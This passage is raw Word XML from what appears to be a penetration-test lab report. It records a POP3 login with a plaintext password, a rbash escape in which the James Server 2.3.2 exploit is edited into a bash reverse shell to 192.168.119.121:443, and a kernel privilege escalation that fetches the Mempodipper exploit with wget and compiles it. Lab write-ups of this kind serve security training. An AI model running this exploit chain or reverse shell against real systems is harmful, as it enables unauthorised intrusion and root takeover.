                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ryuu</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="186B290E" w14:paraId="663DBD95" w14:textId="77777777" w:rsidTr="186B290E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="7EA4300D" w14:textId="3AFA86DC" w:rsidR="186B290E" w:rsidRDefault="186B290E" w:rsidP="186B290E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="C8C3BC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">PASS </w:t>
            </w:r>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>123456</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="186B290E" w14:paraId="04512A17" w14:textId="77777777" w:rsidTr="186B290E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="202FACF5" w14:textId="25BEFAF7" w:rsidR="186B290E" w:rsidRDefault="186B290E" w:rsidP="186B290E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="C8C3BC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>LIST</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="186B290E" w14:paraId="16FC6A1C" w14:textId="77777777" w:rsidTr="186B290E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="21556600" w14:textId="3DE64079" w:rsidR="186B290E" w:rsidRDefault="186B290E" w:rsidP="186B290E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="C8C3BC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">RETR </w:t>
            </w:r>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="28B51E79" w14:textId="77777777" w:rsidR="00854D15" w:rsidRDefault="00854D15" w:rsidP="186B290E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B7302A9" w14:textId="30618842" w:rsidR="00AE353F" w:rsidRDefault="186B290E" w:rsidP="186B290E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc92471634"/>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Lateral Movement – Escaping a Restricted Shell</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="5CDA1F63" w14:textId="77777777" w:rsidR="00B96009" w:rsidRPr="00B96009" w:rsidRDefault="00B96009" w:rsidP="00B96009"/>
    <w:p w14:paraId="261D021F" w14:textId="6D5DF58D" w:rsidR="00B96009" w:rsidRDefault="186B290E" w:rsidP="00AE353F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">After logging in as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ryuu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> we find ourselves in a restricted shell. Using the </w:t>
      </w:r>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>echo $SHELL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command we confirm that it's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rbash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Our Initial Service Enumeration showed that James Server (Version 2.3.2) is outdated and could be vulnerable to the Remote Command Execution (</w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="003E5820">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>EDB 35513</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">) exploit, which is triggered upon a user's login. After making the necessary changes to the payload and setting up our listener, we fire the exploit from our Kali, then log in as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ryuu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> again using SSH to trigger the exploit and receive a reverse connection. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D433CB7" w14:textId="5DB1515B" w:rsidR="186B290E" w:rsidRDefault="186B290E" w:rsidP="186B290E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr w:rsidR="186B290E" w14:paraId="5AD35BC9" w14:textId="77777777" w:rsidTr="186B290E">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="69381E1F" w14:textId="5205B47E" w:rsidR="186B290E" w:rsidRDefault="186B290E" w:rsidP="186B290E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>sed</w:t>
            </w:r>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="C8C3BC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> -c</w:t>
            </w:r>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="00AAAA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>s_^payload</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>= .</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>*_payload = """/bin/bash -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt;\&amp; /dev/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/192.168.119.121/443 0&gt;\&amp;1"""_'</w:t>
            </w:r>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="C8C3BC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/tmp/beta.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="186B290E" w14:paraId="02195102" w14:textId="77777777" w:rsidTr="186B290E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="08C98ED5" w14:textId="2FF158A3" w:rsidR="186B290E" w:rsidRDefault="186B290E" w:rsidP="186B290E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                <w:color w:val="AA5500"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>python</w:t>
            </w:r>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="C8C3BC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 135513.py 10.11.1.72</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="186B290E" w14:paraId="64B8BE79" w14:textId="77777777" w:rsidTr="186B290E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="79FB1E18" w14:textId="29C63539" w:rsidR="186B290E" w:rsidRDefault="186B290E" w:rsidP="186B290E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                <w:color w:val="C8C3BC"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>nc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="C8C3BC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> –</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="C8C3BC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>lvnp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="C8C3BC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>443</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21145881" w14:textId="1B657A84" w:rsidR="00417905" w:rsidRDefault="00417905" w:rsidP="00BB52B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0" w:after="240"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F19C796" w14:textId="77777777" w:rsidR="00BB52B8" w:rsidRPr="00BB52B8" w:rsidRDefault="00BB52B8" w:rsidP="00BB52B8"/>
    <w:p w14:paraId="11453287" w14:textId="57F9B151" w:rsidR="00AE353F" w:rsidRPr="004F5F59" w:rsidRDefault="186B290E" w:rsidP="004F5F59">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc92471635"/>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Privilege Escalation – Kernel Exploitation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="14756603" w14:textId="77777777" w:rsidR="004F5F59" w:rsidRDefault="004F5F59" w:rsidP="00AE353F"/>
    <w:p w14:paraId="2BED7C4F" w14:textId="3BDCCDA8" w:rsidR="00AE353F" w:rsidRDefault="186B290E" w:rsidP="00AE353F">
      <w:r>
        <w:t xml:space="preserve">We quickly fix the path using the </w:t>
      </w:r>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>export</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command. Checking the OS and the kernel to find our they both are outdated. Based on our target being Ubuntu 11.01, 3.0.0-12-generic and 32bit, we chose the '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mempodipper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>' Local Privilege Escalation exploit (</w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="003E5820">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>EDB 35161</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="186B290E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is already installed on our target, so we can download the exploit and obtain the root shell using the following commands: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4EF723" w14:textId="16D28051" w:rsidR="186B290E" w:rsidRDefault="186B290E" w:rsidP="186B290E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="06A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr w:rsidR="186B290E" w14:paraId="7BA26847" w14:textId="77777777" w:rsidTr="186B290E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="66C980AF" w14:textId="124DA0D2" w:rsidR="186B290E" w:rsidRDefault="186B290E" w:rsidP="186B290E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                <w:color w:val="C8C3BC"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>wget</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="C8C3BC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 192.168.119.121:8080/35161.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="186B290E" w14:paraId="396F4CEA" w14:textId="77777777" w:rsidTr="186B290E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="19AEC41A" w14:textId="3CCB8401" w:rsidR="186B290E" w:rsidRDefault="186B290E" w:rsidP="186B290E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                <w:color w:val="C8C3BC"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>gcc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="C8C3BC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 35161.c -o beta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="186B290E" w14:paraId="5F2BD73C" w14:textId="77777777" w:rsidTr="186B290E">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="112DF874" w14:textId="047138B2" w:rsidR="186B290E" w:rsidRDefault="186B290E" w:rsidP="186B290E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">python </w:t>
            </w:r>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="C8C3BC"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-c </w:t>
            </w:r>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">'import </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pty;pty</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.spawn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>("/bin/bash")'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="186B290E" w14:paraId="033C63CB" w14:textId="77777777" w:rsidTr="186B290E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="1542E8A5" w14:textId="0DC7ECA8" w:rsidR="186B290E" w:rsidRDefault="186B290E" w:rsidP="186B290E">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica Neue" w:hAnsi="Helvetica Neue"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="00AAAA"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">export </w:t>
            </w:r>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA0000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>PATH</w:t>
            </w:r>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:color w:val="AA5500"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>"/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="186B290E">
              <w:rPr>
